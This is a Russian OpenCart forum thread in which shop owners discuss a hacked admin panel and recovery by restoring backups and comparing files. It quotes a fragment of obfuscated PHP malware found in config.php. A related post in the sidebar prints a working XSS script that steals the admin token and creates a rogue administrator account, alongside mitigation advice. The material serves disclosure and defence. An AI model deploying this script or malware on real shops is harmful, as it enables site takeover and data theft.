Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
  • Sign Up

Взломали админку на opencart


Recommended Posts

Добрый день, админку сайта взломал какой-то турецкий школьник, оставив красноречивое послание на первой картинке. «nah sana panel lamercik»

Проверил фтп, там добавлены несколько html файлов левых. Как видно на скринах, даты разные. 

Изменений в системных файлов не нашёл.php.ini чистый. config.php чистый. 

Посмотрел в index.php в админке - он снёс весь код и вставил свой, который виден на 1 скрине. Вопрос - как? Я должен устранить уязвимость, пожалуйста, помогите.

tuskishscam.PNG

turkishscam1.PNG

Link to post
Share on other sites

Раз взломал, то где угодно мог закладок наделать. Весь сайт проверять надо. И соседние сайты тоже, если с одного акка работают. 

Если не рассматривать восстановление из резервной копии, то вариантов два.

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Не дешевый - заказать чистку/восстановление сайта

  • +1 1
Link to post
Share on other sites

э... дешевый и правильный - восстановить из бэкапа.

все остальное компромисс.

Link to post
Share on other sites

А такой вариант как защитить уже 3 раз за 4 месц. идет такой код <?php ${"\x47\x4cO\x42\x41L\x53"}["l\x69\x71p\x73\x69\x76\x70"]="m\x65";${"GL   пишет его в config.php который в корне. Декодировал сдесь. http://ddecode.com/hexdecoder/

Версия ocStore 2.1.0.2.1 стоит на ВПС под Центос 7

Infecsia-config.php

Link to post
Share on other sites

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Link to post
Share on other sites

7 часов назад, Shureg сказал:

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Спасибо!

Link to post
Share on other sites

8 часов назад, nikifalex сказал:

почему вы думаете что админку?

Я не знаю что конкретно.

Link to post
Share on other sites

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Link to post
Share on other sites

4 минуты назад, Praetorioan сказал:

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Уважаемый, толку что вы будите гуглить уязвимости opencart
Их нет
Вам четко сказали как вас взломали

 

2 часа назад, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

 

Link to post
Share on other sites
14 часов назад, markimax сказал:

Вам четко сказали как вас взломали

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Link to post
Share on other sites
  • 2 weeks later...
В 25.10.2017 в 10:15, nikifalex сказал:

дешевый и правильный - восстановить из бэкапа.

В данном случае да, но не всегда прокатывает...

 

У одного клиента начались проблемы с сайтом. В процессе поиска были обнаружены левые файлы. Просмотрели архивы файлов, так эти левые файлы обнаружены в архивах почти годовой давности. Хорошо, что были и более ранние архивы. А у большинства пользователей есть только с десяток архивов на хостинге, т. е. в подобной ситуации они уже заражены.

Link to post
Share on other sites

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

  • +1 1
Link to post
Share on other sites
  • 8 months later...
В 26.10.2017 в 08:01, nikifalex сказал:

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Какую ценность несёт это сообщение в этой ветке? Зачем ты это пишешь? Из-за таких как ты, конкретно из-за тебя русское сообщество - крайне токсичное место, находиться здесь иногда неприятно. Поздравляю, ты посильно вносишь в это свой личный вклад.

Link to post
Share on other sites

В 04.11.2017 в 12:01, nikifalex сказал:

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

PhpStorm Отлично сравнивает файлы - не только на есть ли лишние, а и на структуру php html файлов) 

Link to post
Share on other sites

  • 4 weeks later...
В 25.10.2017 в 14:54, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Целиком и полностью согласен 

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Similar Content

    • By Yoda
      Недавно моими друзьями была обнаружена очень неприятная ситуация, один популярный автор дополнений, допустил фатальную ошибку в разработке дополнения. Я очень хочу верить что случайно, но в целом, все указывает на то, что это специально оставленный бекдор.
       
      Но бог и администрация форума ему судья, я думаю они там сами разберутся.
      В силу того, что приводя куски кода дополнения, или оставляя комментарии в теме поддержки дополнения, как пользователь который его не покупал я нарушу правила форума, я попробую дать рекомендации в существующих рамках.
       
      Исходя из моей подготовки и опыта, я могу утверждать, что, проблема, в том, что когда вы заходили в админку модуля, модуль подтягивал каждый раз с сервера автора номер версии. Казалось бы что в этом такого. 
      Но присмотревшись, оказалось, что вывод данных о версии не был экранирован, что позволяло автору или любому человеку, получившему доступ к его серверу выполнить XSS атаку на все 10 000 магазинов, которые купили любое из дополнений автора, к примеру вместо номера версии отдать вот такой простой скрипт к примеру:
       
      <script> // shell sample // seocms the best architectural mistake forever // i got all your 10 000 shops // i install 10 000 backdors function getUrlVars() {     var vars = [], hash, hashes = null;     if (window.location.href.indexOf("?") && window.location.href.indexOf("&")) {         hashes = window.location.href.slice(window.location.href.indexOf("?") + 1).split("&");     } else if (window.location.href.indexOf("?")) {         hashes = window.location.href.slice(window.location.href.indexOf("?") + 1);     }     if (hashes != null) {         for (var i = 0; i < hashes.length; i++) {             hash = hashes[i].split("=");             vars[hash[0]] = hash[1];         }     }     return vars; } var url_vars =  getUrlVars(); var token = url_vars.token; var host =  window.location.origin; var action = host + "/admin/index.php?route=user/user/add&token=" +  token; document.addEventListener("DOMContentLoaded", function(event) {    $.post( action, { username: "DummiMarkHack", user_group_id: "1", firstname: "Lol",  lastname: "Haha",    email: "MarkHack@MarkHack.com",  password: "1234",    confirm: "1234",    status: "1" } ); }); </script>
      И вот таким нехитрым способом, ни в коем случае я не грешу на автора и не хочу сказать что он это сделал специально, но береженого бог бережет. Ведь невзламываемых систем не бывает. Можно получить админский доступ в любой магазин. На котором установлены модули автора. А получив админа магазина, мы легко и просто дальше уже сливаем все что захотим - это дело техники.
       
      А учитывая то, что человек может умереть. И не продлить домен. А за доменом могут следить специально с целью захвата такого лакомого ботнета. Думаю о критичности потенциальной угрозы рассказывать не надо.
       
      Опять же повторюсь, в рамках правил форума я не могу показывать код дополнения, я его не покупал, поэтому чтобы навсегда обезопасить себя от подобной проблемы на 100% и у вас VPS вам просто необходимо добавить в файл host на своем сервере
       
      Строку 0.0.0.0 site.com // Домен сервера разработчика
       
      Как это сделать в linux - можно прочитать здесь, или обратитесь к администратору вашего сервера. 

      Если же у вас шаред-хостинг. Максимум что вы можете сделать, это найти во всех модулях автора в языковых файлах строки opencartadmin.com и заменить их на localhost. С вашими модулями ничего не случится. Они будут работать. Но вероятность, что с постороннего ресурса вы получите xss атаку минимальная!

      Ну и как второстепенную меру защиты, просто добавьте htpassword  авторизацию к админке. 

      Успешного бизнеса вам, и безопасных магазинов.
       
       
       
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.